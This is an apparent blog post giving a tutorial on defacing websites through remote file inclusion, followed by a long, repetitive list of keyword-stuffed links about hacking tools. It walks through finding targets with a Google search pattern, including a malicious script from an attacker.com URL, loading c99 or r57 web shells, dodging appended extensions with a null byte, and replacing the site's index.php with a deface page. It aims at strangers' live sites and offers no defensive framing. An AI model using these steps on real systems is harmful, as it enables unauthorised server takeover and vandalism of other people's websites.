Blogger templates

Backstreet Boys - Show Me the Meaning.mp3
Found at bee mp3 search engine

Monday, June 5, 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related articles


  1. Pentest Tools List
  2. Hack Tools Pc
  3. Hacking Tools For Beginners
  4. Pentest Tools Find Subdomains
  5. Nsa Hack Tools Download
  6. Hacking Tools Name
  7. Hacker Tools Github
  8. Hacker Tools Apk Download
  9. World No 1 Hacker Software
  10. Hacking Tools Github
  11. Best Pentesting Tools 2018
  12. Pentest Tools Free
  13. Hacker Tools
  14. Pentest Tools Open Source
  15. Top Pentest Tools
  16. Pentest Recon Tools
  17. Hack Tools For Pc
  18. Hacking Tools Free Download
  19. Hacker Tools For Mac
  20. Hacking Tools Mac
  21. Hacking Tools 2020
  22. Hack Rom Tools
  23. Growth Hacker Tools
  24. Pentest Tools For Windows
  25. Hacking App
  26. Hack Tools 2019
  27. Hack Tools Mac
  28. Hacking Tools Hardware
  29. Hack Tools Online
  30. Best Hacking Tools 2020
  31. Hacker Tools
  32. What Is Hacking Tools
  33. Hacking Tools Github
  34. Hacking Tools Kit
  35. Hacker Tools Windows
  36. Pentest Tools Nmap
  37. Pentest Tools Windows
  38. Hack Tools Download
  39. Termux Hacking Tools 2019
  40. Install Pentest Tools Ubuntu
  41. Best Pentesting Tools 2018
  42. Hack Tools
  43. Usb Pentest Tools
  44. Tools For Hacker
  45. Pentest Tools For Ubuntu
  46. Hacking Tools Windows
  47. Pentest Tools Free
  48. Pentest Tools Alternative
  49. Hacking Tools Windows
  50. Physical Pentest Tools
  51. Usb Pentest Tools
  52. Hack Tools
  53. Beginner Hacker Tools
  54. Pentest Tools Open Source
  55. Hacking Tools Free Download
  56. Hacker Tools Mac
  57. Hack Tools Github
  58. Tools Used For Hacking
  59. Pentest Tools Subdomain
  60. Ethical Hacker Tools
  61. New Hacker Tools
  62. Hacker Tools Windows
  63. New Hacker Tools
  64. Hacking Tools 2020
  65. Hacking Tools For Windows Free Download
  66. Pentest Automation Tools
  67. Hacker Tools Free
  68. Pentest Tools Alternative
  69. Hack Tools Download
  70. Android Hack Tools Github
  71. Pentest Recon Tools
  72. Tools Used For Hacking
  73. Pentest Tools Download
  74. How To Hack
  75. Hacking Tools And Software
  76. Pentest Tools Open Source
  77. Hack Tools Mac
  78. Pentest Tools Kali Linux
  79. Tools 4 Hack
  80. Kik Hack Tools
  81. Hack Tools
  82. Hack Tools For Mac
  83. Hack Website Online Tool
  84. Pentest Tools Nmap
  85. Pentest Tools Linux
  86. Tools For Hacker
  87. What Is Hacking Tools
  88. Hacker Tools Github
  89. Hacker Tools Free
  90. Hack App
  91. What Are Hacking Tools
  92. Hacker Tools Apk Download
  93. Usb Pentest Tools
  94. World No 1 Hacker Software
  95. Hack Website Online Tool
  96. Hack Tools For Ubuntu
  97. Install Pentest Tools Ubuntu
  98. Tools Used For Hacking

0 comments:

Post a Comment